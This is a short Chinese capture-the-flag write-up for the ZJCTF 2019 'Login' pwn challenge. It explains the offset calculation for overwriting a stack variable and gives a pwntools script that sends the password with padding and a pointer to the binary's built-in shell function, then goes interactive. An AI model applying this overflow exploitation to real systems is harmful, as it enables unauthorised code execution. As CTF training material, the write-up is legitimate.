[ZJCTF 2019]Login的wp - 代码天地

[ZJCTF 2019]Login的wp

其他 2021-03-06 19:10:39 阅读次数: 0

先运行，输入admin和2jctf_pa5sw0rd，发现报错，gdb开始调试
在这里插入图片描述
进入ida看看

在read_password里找到var_18

然后通过覆盖var_18，让他跳到程序自带的shell里
60-18 = 48
e+3a = 48
exp

from pwn import *
 
io = remote('node3.buuoj.cn',28457)
 
shell = 0x400e88
io.sendlineafter(': ','admin')
io.sendlineafter(': ','2jctf_pa5sw0rd'+'\x00'*58+p64(shell))
 
io.interactive()

猜你喜欢

转载自blog.csdn.net/wuyvle/article/details/114419072

[ZJCTF 2019]Login的wp

[ZJCTF 2019]Login

[ZJCTF 2019]EasyHeap的wp

[栈溢出+参数跟踪] [ZJCTF 2019]Login

[ZJCTF 2019]NiZhuanSiWei

[ZJCTF 2019]EasyHeap

2019-ZJCTF

ZJCTF 2019 Pwn

buuctf [ZJCTF 2019]EasyHeap

[ZJCTF 2019]NiZhuanSiWei 1

[ZJCTF 2019]NiZhuanSiWei && [BJDCTF2020]ZJCTF，不过如此

ZJCTF_2019_EasyHeap做题记录

buuctf pwn （inndy_rop）（cmcc_simplerop）（[ZJCTF 2019]Login）

【wp】ZJCTF-我的方便面没有调料包战队

buuctf （babyheap_0ctf_2017）（[ZJCTF 2019]EasyHeap）初学堆的两道例题

ZJCTF2021-crackPYC

[原题复现+审计][ZJCTF 2019] WEB NiZhuanSiWei(反序列化、PHP伪协议、数组绕过)

[BJDCTF2020]ZJCTF，不过如此

ZJCTF预赛一个.py的逆向题

【pwn】 hitcontrain_bamboobox && ZJCTF_19_EasyHeap

JMeter：wp_login (cookie相关的操作)

【学习笔记 39】 buu [BJDCTF2020]ZJCTF，不过如此

DDCTF 2019 部分WP

2019 NCTF Re WP

Syclover2019 WP

GXYCTF2019WP

【Pwn】SWPUCTF_2019_login

更改wordpress的默认登录页面名称wp-login

WordPress开发之WP Custom Register Login插件试用

[BJDCTF2020]ZJCTF，不过如此—preg_replace代码执行之看了包会(代码审计5)

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)